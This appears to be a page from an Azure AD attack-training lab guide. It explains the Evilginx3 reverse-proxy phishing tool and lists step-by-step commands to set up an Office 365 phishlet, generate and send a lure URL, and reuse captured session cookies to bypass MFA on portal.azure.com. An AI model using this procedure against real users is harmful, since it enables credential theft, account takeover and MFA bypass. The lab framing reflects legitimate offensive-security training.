Evilginx3

We can use Evilginx3 (https://github.com/kgretzky/evilginx2) for phishing attacks. Evilginx acts as a relay/man-in-the-middle between the legit web page and the target user. The user always interacts with the legit website and Evilginx captures usernames, passwords and authentication cookies. It uses phishlets that are configuration files for specific target domains. These are YAML files that specify conditions like hosts, filters, structure of authentication cookies and credentials.

Evilginx3 will require some initial setup.

Start evilginx3

C:\AzAD\Tools\evilginx-v3.3.0\evilginx.exe -p
evilginx -p C:\AzAD\Tools\evilginx-3.3.0\phishlets -developer

Configure the domain

config domain studentx.corp

Set the IP for the server

config ipv4 external 172.16.x.x

Use the template for Office 365

phishlets hostname o365 studentx.corp

Verify DNS

phishlets get-hosts o365

Enable phishlets

phishlets enable o365

Create the phishing URL

lures create o365

Get the phishing URL

lures get-url <ID>

Send the URL

Once someone clicks on it, you will get clear text credentials and session info to bypass MFA. To interact with the session:

sessions

and use the session number to interact with it. You would most likely add the cookie and try to log into https://portal.azure.com

sessions 1

PreviousBlob Storage NextEnumeration

Last updated 11 hours ago